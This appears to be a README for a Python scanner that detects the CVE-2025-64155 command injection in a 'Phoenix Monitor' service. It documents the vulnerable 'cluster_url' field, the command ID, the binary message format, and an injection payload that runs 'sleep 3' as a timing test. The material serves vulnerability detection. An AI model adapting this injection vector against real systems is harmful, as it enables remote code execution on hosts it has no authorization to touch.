Share
## https://sploitus.com/exploit?id=D89C32C9-D479-5F40-AA80-787EA37E28FC
# CVE-2025-64155 Scanner

A Python scanner for detecting the command injection vulnerability (CVE-2025-64155) in Phoenix Monitor service.

## Description

CVE-2025-64155 is a command injection vulnerability in Phoenix Monitor service that allows remote code execution through the `cluster_url` parameter in the `handleStorageRequest` command (command ID: 1075724911).

The vulnerability occurs when user-controlled input in the `cluster_url` field is passed to a shell command without proper sanitization, allowing command injection via shell metacharacters.

This scanner is based on the exploit research by [Horizon3AI](https://github.com/horizon3ai/CVE-2025-64155).

## Features

- **Time-based detection**: Uses safe, non-destructive time-based detection method
- **SSL/TLS support**: Handles SSL connections with certificate validation bypass
- **Verbose mode**: Detailed output for debugging
- **Service check**: Option to check if service is accessible without testing vulnerability

## Requirements

- Python 3.6+
- Standard library only (no external dependencies)

## Usage

### Basic Scan

```bash
python3 scanner.py -t 
```

### Advanced Options

```bash
# Specify custom port
python3 scanner.py -t 192.168.1.100 -p 7900

# Enable verbose output
python3 scanner.py -t 192.168.1.100 -v

# Set custom timeout
python3 scanner.py -t 192.168.1.100 --timeout 15

# Check if service is accessible (no vulnerability test)
python3 scanner.py -t 192.168.1.100 --check-only
```

### Command Line Arguments

- `-t, --target`: Target IP address or hostname (required)
- `-p, --port`: Phoenix Monitor service port (default: 7900)
- `--timeout`: Connection timeout in seconds (default: 10)
- `-v, --verbose`: Enable verbose output
- `--check-only`: Only check if service is accessible

## How It Works

The scanner uses a **time-based detection** method:

1. Connects to the Phoenix Monitor service over SSL/TLS
2. Sends a `handleStorageRequest` command with a malicious payload containing `sleep 3` in the `cluster_url` field
3. Measures the response time
4. If the response is delayed by ~3 seconds, the target is likely vulnerable (command was executed)

This method is safe and non-destructive - it doesn't execute harmful commands, only a harmless `sleep` command for detection purposes.

## Example Output

### Vulnerable Target

```
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900

[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 3.12 seconds

============================================================
[+] VULNERABLE: Target appears to be vulnerable to CVE-2025-64155
[+] Details: Time-based detection: Response delayed by 3.12s (likely command injection)
```

### Non-Vulnerable Target

```
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900

[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 0.45 seconds

============================================================
[-] NOT VULNERABLE: Target does not appear to be vulnerable
[-] Details: Response received quickly (0.45s), likely not vulnerable
```

## Technical Details

### Message Format

The scanner sends a binary message with the following structure:

```
[4 bytes] Message length (156)
[4 bytes] Payload length
[4 bytes] Command ID (1075724911 = 0x4018006F = handleStorageRequest)
[4 bytes] Padding/Flags (0)
[Variable] XML payload
```

### Payload Structure

The XML payload contains a command injection in the `cluster_url` field:

```xml

    http://10.0.0.1:9200 --next -o /dev/null sleep 3
    ...

```

## Disclaimer

This tool is for authorized security testing and research purposes only. Only use this tool on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

## License

MIT License - see LICENSE file for details.